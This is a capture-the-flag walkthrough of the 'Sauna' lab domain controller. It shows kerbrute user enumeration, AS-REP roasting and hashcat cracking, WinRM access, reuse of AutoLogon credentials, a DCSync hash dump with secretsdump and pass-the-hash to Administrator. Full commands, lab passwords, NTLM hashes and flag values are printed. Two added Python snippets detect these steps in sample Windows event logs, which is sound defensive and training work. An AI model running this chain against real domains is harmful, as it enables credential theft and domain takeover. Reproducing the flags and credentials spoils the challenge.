Proof of Concept

10.129.3.196

Nmap

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Information Gathering

Collecting host information

┌──(kali㉿kali)-[~/Sauna]
└─$ nxc smb 10.129.3.196 --generate-hosts-file host
SMB         10.129.3.196    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Sauna]
└─$ cat host
10.129.3.196     SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA

Configuring the /etc/hosts file

┌──(kali㉿kali)-[~/Sauna]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.3.196     SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA

Initial Access

Employee names found on the /about.html page of the web service on port 80

  • Fergus Smith
  • Shaun Coins
  • Hugo Bear
  • Bowie Taylor
  • Sophie Driver
  • Steven Kerb

User enumeration showed that the account fsmith exists; it can be inferred to be the first initial plus surname of "Fergus Smith".

┌──(kali㉿kali)-[~/Sauna]
└─$ ./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.3.196 -d egotistical-bank.local
 
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
 
Version: v1.0.3 (9dad6e1) - 02/22/26 - Ronnie Flathers @ropnop
 
2026/02/22 10:27:55 >  Using KDC(s):
2026/02/22 10:27:55 >  	10.129.3.196:88
 
 
2026/02/22 10:28:43 >  [+] VALID USERNAME:	 administrator@egotistical-bank.local
2026/02/22 10:33:07 >  [+] VALID USERNAME:	 hsmith@egotistical-bank.local
2026/02/22 10:33:48 >  [+] VALID USERNAME:	 Administrator@egotistical-bank.local
2026/02/22 10:36:22 >  [+] VALID USERNAME:	 fsmith@egotistical-bank.local
<SNIP>

Created a user list from the employee names found on /about.html

┌──(kali㉿kali)-[~/Sauna]
└─$ cat userlist.txt
FSmith
SCoins
HBear
BTaylor
SDriver
SKerb

AS-REP Roasting against the list, looking for accounts with Kerberos pre-authentication disabled, showed that FSmith has it disabled, and that user's hash was obtained

┌──(kali㉿kali)-[~/Sauna]
└─$ nxc ldap egotistical-bank.local -u userlist.txt -p '' --asreproast asreproast.hash
LDAP        10.129.3.196    389    SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
LDAP        10.129.3.196    389    SAUNA            $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e967e82b5400e3d7b11301f8f90c85e0$<SNIP>
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
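A defender's counterpart to the enumeration and roast above, added here as an example and not part of the original writeup: it scans constructed Windows Security event 4768 (Kerberos TGT requested) records for the two traces this chain leaves on the DC, a burst of status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) failures from one source during username guessing, and a TGT issued with PreAuthType 0 (no pre-authentication) and RC4 (etype 0x17) for the roasted account. The sample records, the attacker address and the threshold are constructed assumptions; field names follow the 4768 event data.

```python
from collections import Counter

# Constructed sample Security event 4768 records, reduced to the fields that
# matter here; they are not real logs from SAUNA.
#   Status      : ResultCode (0x0 success, 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN)
#   PreAuthType : 0 = logon without pre-authentication, 2 = encrypted timestamp
#   Etype       : TicketEncryptionType (0x17 RC4-HMAC, 0x12 AES256)
ATTACKER = "10.10.14.5"  # constructed source address for the sample
SAMPLE_4768 = [
    {"Target": "hsmith", "Status": "0x0", "PreAuthType": "2", "Etype": "0x12", "Ip": "10.129.3.50"},
] + [
    # wordlist-driven guessing: every unknown name yields a 0x6 failure
    {"Target": name, "Status": "0x6", "PreAuthType": "-", "Etype": "0xffffffff", "Ip": ATTACKER}
    for name in ("fergus", "shaun", "hugo", "bowie", "sophie", "steven")
] + [
    # the roast itself: a TGT issued with no pre-auth and an RC4 enc-part
    {"Target": "FSmith", "Status": "0x0", "PreAuthType": "0", "Etype": "0x17", "Ip": ATTACKER},
]


def unknown_principal_bursts(events, threshold=5):
    """Map client IP -> count for sources with at least `threshold` 4768
    failures of status 0x6; a burst of these from one address is the mark
    of kerbrute-style username guessing against the KDC."""
    counts = Counter(e["Ip"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in counts.items() if n >= threshold}


def asrep_roast_candidates(events):
    """(account, client IP, etype) for every TGT issued without
    pre-authentication (PreAuthType 0) and with RC4 (0x17): the AS-REP that
    hashcat mode 18200 cracks offline. PreAuthType 0 alone already identifies
    an account with DONT_REQ_PREAUTH set, which is the setting to remove."""
    return [(e["Target"], e["Ip"], e["Etype"]) for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0" and e["Etype"] == "0x17"]


if __name__ == "__main__":
    print("guessing sources:", unknown_principal_bursts(SAMPLE_4768))
    print("roasted accounts:", asrep_roast_candidates(SAMPLE_4768))
```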

Cracked the hash to obtain the plaintext password

  • FSmith:Thestrokes23

┌──(kali㉿kali)-[~/Sauna]
└─$ hashcat -m 18200 asreproast.hash /usr/share/wordlists/rockyou.txt --quiet
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e967e82b5400e3d7b11301f8f90c85e0$<SNIP>:Thestrokes23

Successfully connected over WinRM with the recovered FSmith credentials

┌──(kali㉿kali)-[~/Sauna]
└─$ evil-winrm -i egotistical-bank.local -u 'FSmith' -p 'Thestrokes23'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
c893caf3c8a65db432d018f5b985423d
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::e6
   IPv6 Address. . . . . . . . . . . : dead:beef::4d7:86e0:5b6:4ae8
   Link-local IPv6 Address . . . . . : fe80::4d7:86e0:5b6:4ae8%7
   IPv4 Address. . . . . . . . . . . : 10.129.3.196
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
                                       10.129.0.1

Lateral Movement (auth as svc_loanmgr)

WinPEAS enumeration found AutoLogon credentials

  • svc_loanmanager:Moneymakestheworldgoround!

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Using the discovered password, authentication to the WinRM service as svc_loanmgr succeeded (the AutoLogon DefaultUserName is svc_loanmanager, but the domain account that accepts the password is svc_loanmgr)

┌──(kali㉿kali)-[~/Sauna]
└─$ nxc winrm egotistical-bank.local -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
WINRM       10.129.3.196    5985   SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.129.3.196    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)

WinRM connection as svc_loanmgr

┌──(kali㉿kali)-[~/Sauna]
└─$ evil-winrm -i egotistical-bank.local -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

Privilege Escalation

BloodHound data collection

┌──(kali㉿kali)-[~/Sauna]
└─$ bloodhound-python -d 'egotistical-bank.local' -u 'FSmith' -p 'Thestrokes23' -c All -ns 10.129.3.196 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Testing resolved hostname connectivity dead:beef::4d7:86e0:5b6:4ae8
INFO: Trying LDAP connection to dead:beef::4d7:86e0:5b6:4ae8
INFO: Testing resolved hostname connectivity dead:beef::e6
INFO: Trying LDAP connection to dead:beef::e6
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Testing resolved hostname connectivity dead:beef::4d7:86e0:5b6:4ae8
INFO: Trying LDAP connection to dead:beef::4d7:86e0:5b6:4ae8
INFO: Testing resolved hostname connectivity dead:beef::e6
INFO: Trying LDAP connection to dead:beef::e6
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 48S
INFO: Compressing output into 20260222174552_bloodhound.zip

BloodHound shows that the user SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL has the GetChangesAll permission on the domain EGOTISTICAL-BANK.LOCAL.

Obtained the Administrator NTLM hash with impacket-secretsdump

  • 823452073d75b9d1cf70ebdf86c7f98e

┌──(kali㉿kali)-[~/Sauna]
└─$ impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@egotistical-bank.local'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:dc9e6e68a553b0a9d8d167be35f9165f:::
[*] Kerberos keys grabbed
<SNIP>
[*] Cleaning up...
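For the GetChangesAll finding and the DRSUAPI dump above, an added detection example that is not part of the original writeup: it filters constructed Windows Security event 4662 records for control-access operations on the domain object that reference the directory-replication right GUIDs, performed by a principal that is not a domain controller account. The DC allowlist, the sample records and the reduced field set are assumptions; the GUIDs are the documented DS-Replication-Get-Changes control access rights.

```python
# Well-known control-access right GUIDs for directory replication; a
# principal exercising them against the domain object is doing what
# secretsdump's DRSUAPI method (DCSync) does.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # 4662 AccessMask for an extended/control-access right
DOMAIN_DN = "DC=EGOTISTICAL-BANK,DC=LOCAL"
DC_ACCOUNTS = {"SAUNA$"}  # assumed allowlist: accounts that legitimately replicate

# Constructed Security event 4662 records (not real logs from the target),
# reduced to Subject, ObjectName, AccessMask and Properties.
SAMPLE_4662 = [
    {"Subject": "SAUNA$", "ObjectName": DOMAIN_DN, "AccessMask": CONTROL_ACCESS,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"Subject": "svc_loanmgr", "ObjectName": DOMAIN_DN, "AccessMask": CONTROL_ACCESS,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # ordinary read of a user object: no replication GUID, not control access
    {"Subject": "FSmith", "ObjectName": "CN=FSmith,CN=Users," + DOMAIN_DN, "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_used(event):
    """Names of the replication rights referenced in the event's Properties."""
    props = event["Properties"].lower()
    return [name for guid, name in DS_REPLICATION_GUIDS.items() if guid in props]


def dcsync_alerts(events, dc_accounts=DC_ACCOUNTS):
    """(subject, object, rights) for control-access operations that exercise
    a replication right from a principal outside the DC allowlist."""
    alerts = []
    for e in events:
        if e["AccessMask"] != CONTROL_ACCESS:
            continue
        rights = replication_rights_used(e)
        if rights and e["Subject"] not in dc_accounts:
            alerts.append((e["Subject"], e["ObjectName"], rights))
    return alerts


if __name__ == "__main__":
    for subject, obj, rights in dcsync_alerts(SAMPLE_4662):
        print(f"DCSync-like access by {subject} on {obj}: {', '.join(rights)}")
```

The same GUIDs are what to look for when auditing the domain object's ACL: any non-DC principal holding them, like svc_loanmgr here, can dump every NTLM hash without touching the DC's disk.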

WinRM connection as Administrator using the obtained NTLM hash

┌──(kali㉿kali)-[~/Sauna]
└─$ evil-winrm -i egotistical-bank.local -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
220be78c4d80686e87f5b0967447405c
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::e6
   IPv6 Address. . . . . . . . . . . : dead:beef::4d7:86e0:5b6:4ae8
   Link-local IPv6 Address . . . . . : fe80::4d7:86e0:5b6:4ae8%7
   IPv4 Address. . . . . . . . . . . : 10.129.3.196
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%7
                                       10.129.0.1